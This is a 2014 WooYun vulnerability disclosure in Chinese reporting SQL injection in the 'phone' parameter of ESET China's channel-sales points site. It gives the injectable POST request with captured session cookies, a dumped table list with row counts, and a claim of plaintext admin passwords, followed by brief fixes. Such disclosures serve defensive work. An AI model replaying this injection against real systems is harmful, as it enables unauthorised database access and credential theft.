漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-049134
漏洞标题:ESET NOD32某系统存在SQL注入及信息泄露(明文密码)
相关厂商:ESET NOD32
漏洞作者: Mr.leo
提交时间:2014-01-17 10:56
修复时间:2014-01-22 10:56
公开时间:2014-01-22 10:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-17: 细节已通知厂商并且等待厂商处理中
2014-01-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
ESET NOD32某系统存在SQL注入及信息泄露(明文密码)
详细说明:
站点:
http://51.eset.com.cn/ 渠道销售积分系统
phone参数没有过滤,导致注射
burp抓取数据包
POST /index.php/user/lookpwd HTTP/1.1
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://51.eset.com.cn/
Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d57d0d9782a1adaa9a207c55dc14b92a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22112.80.230.66%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221389921049%22%3B%7D880687b93f5defac935eb2eb3f7969fe; PHPSESSID=005e5efc592d8bd666082b4766aded0a
Host: 51.eset.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
phone=123&pwdanswer=1&pwdques=1
Database: 51_v2
[26 tables]
+------------------+
| None |
| admin |
| allow_virtual |
| category |
| config |
| game1 |
| integral_details |
| orderinfo |
| orders |
| phone_tmp |
| prize |
| product_attr |
| product_old |
| province |
| recordhistory |
| sellhistory |
| sellhistory_old |
| stock |
| stock_tmp |
| sysannouncement |
| trackcode_tmp |
| userinfo |
| users |
| users_222 |
| users_old |
| weekreport |
+------------------+
Database: 51_v2
+------------------+---------+
| Table | Entries |
+------------------+---------+
| trackcode_tmp | 22142 |
| sellhistory_old | 9893 |
| recordhistory | 7374 |
| integral_details | 5928 |
| stock | 5488 |
| users_old | 3461 |
| users_222 | 819 |
| sellhistory | 607 |
| weekreport | 385 |
| phone_tmp | 343 |
| users | 235 |
| product_attr | 200 |
| allow_virtual | 63 |
| product_old | 52 |
| game1 | 49 |
| province | 34 |
| userinfo | 32 |
| orders | 12 |
| category | 5 |
| admin | 3 |
| config | 1 |
| prize | 1 |
| sysannouncement | 1 |
+------------------+---------+
admin表密码明文存储
USERS表的字段,不多说
over
漏洞证明:
已经证明
修复方案:
1#过滤参数
2#密码加盐
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-01-22 10:56
厂商回复:
最新状态:
暂无